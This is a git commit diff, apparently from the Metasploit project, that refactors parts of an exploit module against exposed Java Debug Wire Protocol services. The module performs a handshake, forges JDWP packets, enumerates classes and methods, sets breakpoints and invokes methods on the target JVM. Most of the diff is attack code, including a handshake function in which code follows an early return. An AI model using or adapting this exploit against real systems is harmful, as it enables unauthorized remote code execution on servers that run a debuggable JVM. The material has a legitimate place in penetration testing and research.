Fix suggestions
This commit is contained in:
parent
60c5307475
commit
6061e5e713
|
@ -6,11 +6,9 @@
|
|||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ManualRanking
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
include Msf::Exploit::CheckCode
|
||||
include Msf::Exploit::EXE
|
||||
include Msf::Exploit::FileDropper
|
||||
|
||||
|
@ -127,9 +125,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
vprint_status("#{peer} - Checking for Java Debugging Wire Protocol")
|
||||
|
||||
sock.put(HANDSHAKE)
|
||||
|
||||
res = sock.get(datastore['RESPONSE_TIMEOUT'])
|
||||
res = handshake
|
||||
|
||||
disconnect
|
||||
|
||||
|
@ -145,17 +141,16 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
|
||||
def peer
|
||||
return "#{rhost}:#{rport}"
|
||||
end
|
||||
|
||||
# Establishes handshake with the server
|
||||
def handshake
|
||||
vprint_status("#{peer} - Sending the handshake...")
|
||||
|
||||
sock.put(HANDSHAKE)
|
||||
|
||||
res = sock.get(datastore['RESPONSE_TIMEOUT'])
|
||||
return sock.get(datastore['RESPONSE_TIMEOUT'])
|
||||
|
||||
fail_with(Failure::TimeoutExpired, "#{peer} - Not received response") unless res
|
||||
|
||||
return res == HANDSHAKE
|
||||
end
|
||||
|
||||
# Forges packet for JDWP protocol
|
||||
|
@ -166,13 +161,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
pktlen = data.length + 11
|
||||
|
||||
buf = [pktlen, @myid, flags, cmdset, cmd]
|
||||
buf = [pktlen, @my_id, flags, cmdset, cmd]
|
||||
|
||||
pkt = buf.pack("NNCCC")
|
||||
|
||||
pkt << data
|
||||
|
||||
@myid += 2
|
||||
@my_id += 2
|
||||
|
||||
return pkt
|
||||
end
|
||||
|
@ -279,7 +274,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
data = {}
|
||||
|
||||
formats.each { |fmt,name|
|
||||
formats.each do |fmt,name|
|
||||
if fmt == "L" or fmt == 8
|
||||
data[name] = buf.unpack('Q>')[0]
|
||||
buf.slice!(0..7)
|
||||
|
@ -305,7 +300,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
fail_with(Failure::UnexpectedReply, "Unexpected data when parsing server response")
|
||||
end
|
||||
|
||||
}
|
||||
end
|
||||
entries.append(data)
|
||||
end
|
||||
|
||||
|
@ -329,11 +324,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
entries = parse_entries(response, formats, false)
|
||||
|
||||
entries.each { |entry|
|
||||
entry.each{ |name,value|
|
||||
@vars[name] = value
|
||||
}
|
||||
}
|
||||
entries.each { |e| @vars.merge!(e) }
|
||||
|
||||
end
|
||||
|
||||
|
@ -355,11 +346,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
entries = parse_entries(response, formats, false)
|
||||
|
||||
entries.each { |entry|
|
||||
entry.each{ |name,value|
|
||||
@vars[name] = value
|
||||
}
|
||||
}
|
||||
entries.each { |e| @vars.merge!(e) }
|
||||
|
||||
end
|
||||
|
||||
|
@ -370,7 +357,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
|
||||
# Returns reference types for all classes currently loaded by the target VM
|
||||
def all_classes
|
||||
def get_all_classes
|
||||
|
||||
return unless @classes.empty?
|
||||
|
||||
|
@ -394,13 +381,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# Checks if specified class is currently loaded by the target VM and returns it
|
||||
def get_class_by_name(name)
|
||||
|
||||
@classes.each { |entry_array|
|
||||
@classes.each do |entry_array|
|
||||
|
||||
entry_array.each { |entry|
|
||||
entry_array.each do |entry|
|
||||
|
||||
return entry if entry["signature"].downcase == name.downcase
|
||||
}
|
||||
}
|
||||
end
|
||||
end
|
||||
|
||||
nil
|
||||
end
|
||||
|
@ -434,13 +421,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# Checks if specified method is currently loaded by the target VM and returns it
|
||||
def get_method_by_name(classname, name, signature = nil)
|
||||
|
||||
@methods[classname].each { |entry|
|
||||
@methods[classname].each do |entry|
|
||||
if signature.nil?
|
||||
return entry if entry["name"].downcase == name.downcase
|
||||
else
|
||||
return entry if (entry["name"].downcase == name.downcase) && (entry["signature"].downcase == signature.downcase)
|
||||
end
|
||||
}
|
||||
end
|
||||
|
||||
nil
|
||||
end
|
||||
|
@ -498,12 +485,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
data << [SUSPEND_ALL].pack('C')
|
||||
data << [args.length].pack('N')
|
||||
|
||||
args.each { |kind,option|
|
||||
args.each do |kind,option|
|
||||
|
||||
data << [kind].pack('C')
|
||||
data << option
|
||||
|
||||
}
|
||||
end
|
||||
|
||||
sock.put(create_packet(EVENTSET_SIG, data))
|
||||
|
||||
|
@ -528,7 +515,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# Parses a received event and compares it with the expected
|
||||
def parse_event_breakpoint(buf, event_id)
|
||||
|
||||
num = buf[2..5].unpack('N')[0]
|
||||
r_id = buf[6..9].unpack('N')[0]
|
||||
|
||||
return nil unless event_id == r_id
|
||||
|
@ -562,12 +548,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
data << format(@vars["methodid_size"], meth_id)
|
||||
data << [args.length].pack('N')
|
||||
|
||||
args.each { |arg|
|
||||
args.each do |arg|
|
||||
|
||||
data << arg
|
||||
data << [0].pack('N')
|
||||
|
||||
}
|
||||
end
|
||||
|
||||
sock.put(create_packet(INVOKESTATICMETHOD_SIG, data))
|
||||
|
||||
|
@ -591,12 +577,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
data << [args.length].pack('N')
|
||||
|
||||
args.each { |arg|
|
||||
args.each do |arg|
|
||||
|
||||
data << arg
|
||||
data << [0].pack('N')
|
||||
|
||||
}
|
||||
end
|
||||
|
||||
sock.put(create_packet(INVOKEMETHOD_SIG, data))
|
||||
|
||||
|
@ -615,12 +601,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
data << format(@vars["methodid_size"], meth_id)
|
||||
data << [args.length].pack('N')
|
||||
|
||||
args.each { |arg|
|
||||
args.each do |arg|
|
||||
|
||||
data << arg
|
||||
data << [0].pack('N')
|
||||
|
||||
}
|
||||
end
|
||||
|
||||
sock.put(create_packet(CREATENEWINSTANCE_SIG, data))
|
||||
|
||||
|
@ -846,7 +832,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
break_class = get_class_by_name(classname)
|
||||
|
||||
fail_with(Failure::NotFound, "Could not access #{datastore['BREAK_CLASS']}, possible is not used by application") unless break_class
|
||||
fail_with(Failure::NotFound, "Could not access #{datastore['BREAK_CLASS']}, probably is not used by the application") unless break_class
|
||||
|
||||
get_methods(break_class["reftype_id"])
|
||||
|
||||
|
@ -906,18 +892,21 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def exploit
|
||||
|
||||
@myid = 0x01
|
||||
@my_id = 0x01
|
||||
@vars = {}
|
||||
@classes = []
|
||||
@methods = {}
|
||||
@os = nil
|
||||
|
||||
|
||||
check
|
||||
fail_with(Failure::NotVulnerable, "#{peer} - Doesn't seem to be vulnerable") if check == Exploit::CheckCode::Safe
|
||||
|
||||
# To avoid connection refused due to previously opened connection during check
|
||||
Rex::sleep(1)
|
||||
|
||||
connect
|
||||
|
||||
fail_with(Failure::UnexpectedReply, "Unexpected reply while executing the handshake") unless handshake
|
||||
fail_with(Failure::UnexpectedReply, "Unexpected reply while executing the handshake") unless handshake == HANDSHAKE
|
||||
|
||||
# 1. Get the sizes of variably-sized data types in the target VM
|
||||
idsizes
|
||||
|
@ -926,7 +915,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
get_version
|
||||
|
||||
# 3. Get all currently loaded classes by the target VM
|
||||
all_classes
|
||||
get_all_classes
|
||||
|
||||
# 4. Sets a breakpoint on frequently called method (user-defined)
|
||||
r_id = set_breakpoint
|
||||
|
@ -942,7 +931,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
print_status("#{peer} - Waiting for breakpoint hit #{i} during #{secs} seconds...")
|
||||
|
||||
buf = wait_for_event()
|
||||
buf = wait_for_event
|
||||
|
||||
ret = parse_event_breakpoint(buf, r_id)
|
||||
|
||||
|
|
Loading…
Reference in New Issue